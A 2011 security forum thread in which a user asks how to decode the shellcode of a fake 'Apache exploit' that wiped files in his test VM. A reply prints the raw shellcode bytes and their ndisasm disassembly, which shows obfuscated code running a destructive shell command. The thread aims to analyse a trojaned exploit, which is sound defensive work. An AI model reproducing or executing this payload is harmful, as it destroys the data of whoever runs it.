knives Posted October 20, 2011 Share Posted October 20, 2011 Hello guys, Is there an easier way to reverse engineer a shell code to know what's the payload it did? Is there a software to convert a shellcode to a much more readable output? I've seen and tried software to convert shell codes to assembly language only. Is there a better one? As there are lots fraud hacks/exploits posted around like this one ----> http://pastebin.com/f5571e439 . Might be helpful for everyone as well. Thanks in advance. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted October 20, 2011 Share Posted October 20, 2011 (edited) That example shellcode is in C Most shellcode will be in C typically. I'm not sure what you mean by a "more readable output"... Also not sure what you mean by "Fraud hacks/exploits" Edited October 20, 2011 by Mr-Protocol Quote Link to comment Share on other sites More sharing options...
Hyperant Posted October 20, 2011 Share Posted October 20, 2011 what do you mean most shellcode will topically be in C? I think you should read up on how to write shellcode. http://www.vividmachines.com/shellcode/shellcode.html http://projectshellcode.com/?q=node/12 http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted October 20, 2011 Share Posted October 20, 2011 I suspect he means that most shellcode is contained within C code for delivery. Quote Link to comment Share on other sites More sharing options...
knives Posted October 20, 2011 Author Share Posted October 20, 2011 The link that I mentioned says Apache exploit but if you run that exploit, it will delete your root directory. (I run it on my bt5 vmmachine) That's why i said fraud exploit/hack. And I want to know what else it did on my system that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code. Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted October 20, 2011 Share Posted October 20, 2011 Just a quick hint: if you can, since you are in a vm environment anyhow, take a snapshot before doing risky things (dist-upgrade, running exploits you don't trust, etc.). Sorry I cannot help further on decoding shellcode. Quote Link to comment Share on other sites More sharing options...
int0x80 Posted October 24, 2011 Share Posted October 24, 2011 This is not smc so it is pretty easy: $ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u - 00000000 B8FF2F7368 mov eax,0x68732fff 00000005 C1E808 shr eax,0x8 00000008 50 push eax 00000009 B82F62696E mov eax,0x6e69622f 0000000E 50 push eax 0000000F 89E3 mov ebx,esp 00000011 31C0 xor eax,eax 00000013 50 push eax 00000014 66B87171 mov ax,0x7171 00000018 66355151 xor ax,0x5151 0000001C 6650 push ax 0000001E B82337712F mov eax,0x2f713723 00000023 3551515151 xor eax,0x51515151 00000028 50 push eax 00000029 B8233C717C mov eax,0x7c713c23 0000002E 3551515151 xor eax,0x51515151 00000033 50 push eax 00000034 89E1 mov ecx,esp 00000036 31C0 xor eax,eax 00000038 50 push eax 00000039 66B82D63 mov ax,0x632d 0000003D 6650 push ax 0000003F 89E2 mov edx,esp 00000041 31C0 xor eax,eax 00000043 B064 mov al,0x64 00000045 29C4 sub esp,eax 00000047 31C0 xor eax,eax 00000049 50 push eax 0000004A 51 push ecx 0000004B 52 push edx 0000004C 53 push ebx 0000004D 89E1 mov ecx,esp 0000004F 31D2 xor edx,edx 00000051 31C0 xor eax,eax 00000053 B00B mov al,0xb 00000055 CD80 int 0x80 00000057 B401 mov ah,0x1 00000059 31DB xor ebx,ebx 0000005B CD80 int 0x80 Let me know if you need more help. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted October 25, 2011 Share Posted October 25, 2011 what do you mean most shellcode will topically be in C? I think you should read up on how to write shellcode. http://www.vividmachines.com/shellcode/shellcode.html http://projectshellcode.com/?q=node/12 http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html I know about shell code, I have been through Offensive Security material. Thanks though. I suspect he means that most shellcode is contained within C code for delivery. Yes The link that I mentioned says Apache exploit but if you run that exploit, it will delete your root directory. (I run it on my bt5 vmmachine) That's why i said fraud exploit/hack. And I want to know what else it did on my system that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code. Sometimes that is done intentionally to stop noob from just copy/paste exploit. Have to modify the code to make things work anyways. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.